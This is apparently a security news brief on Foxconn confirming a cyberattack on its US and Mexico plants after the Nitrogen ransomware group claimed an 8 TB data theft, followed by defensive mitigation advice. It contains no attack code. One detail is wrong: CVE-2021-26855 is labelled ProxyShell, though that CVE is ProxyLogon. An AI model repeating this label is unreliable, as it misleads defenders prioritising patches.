Foxconn Confirms North American Factory Cyberattack After Nitrogen Claims 8TB Data Theft

TL;DR: Foxconn confirmed a cyberattack hit its North American factories after the Nitrogen ransomware group claimed to have exfiltrated about 8 TB of data.

Context Foxconn, a key manufacturer for Apple, Dell, Google and Nvidia, disclosed that some of its plants in the United States and Mexico were affected by a recent cyber incident. The company said affected sites are gradually returning to normal operations but did not disclose whether a ransom demand was made.

Key Facts - The Nitrogen ransomware group posted Foxconn on its leak site and asserted it stole approximately 8 TB of confidential files, including project details, schematics and internal documents. - Foxconn confirmed the attack disrupted network services at facilities in Wisconsin and Texas, with employees reporting Wi‑Fi outages, disabled workstations and unavailable digital time‑card systems. - The group, first seen around 2023, is linked to the ALPHV BlackCat ransomware lineage and shares code ancestry with the Conti ransomware family. - Researchers note a flaw in Nitrogen’s encryption routine that can permanently lock data even if attackers later try to restore access. - No public evidence ties the stolen data to unreleased Apple products, though AMD, Google and Intel project files are mentioned in the leak claims.

What It Means The incident underscores a growing trend: ransomware actors targeting manufacturers that sit at the nexus of global supply chains. By compromising a single supplier, threat actors can potentially disrupt production for multiple downstream tech firms. The claimed 8 TB exfiltration highlights the value of intellectual property and operational data in double‑extortion schemes.

Mitigations Security teams should consider the following concrete steps: - Apply patches for known exploitable vulnerabilities commonly used in initial access, such as CVE‑2021‑34527 (PrintNightmare) and CVE‑2021‑26855 (ProxyShell). - Enforce multi‑factor authentication on all remote‑access services and privileged accounts (MITRE ATT&CK T1078). - Segment OT and IT networks, limiting lateral movement techniques (T1021) and restricting SMB/RDP traffic between zones. - Deploy EDR solutions with detection flags for suspicious PowerShell or WMI usage (T1059, T1047) and for unusual large‑file transfers (T1041). - Maintain offline, encrypted backups and test restoration procedures regularly to mitigate impact from T1486 (Data Encrypted for Impact). - Monitor threat‑intelligence feeds for Nitrogen‑specific IOCs, including file hashes and C2 domains linked to recent leaks.

What to watch next: whether Foxconn discloses any ransom payment details, how the alleged 8 TB leak evolves on underground markets, and whether other suppliers report similar Nitrogen‑linked intrusions.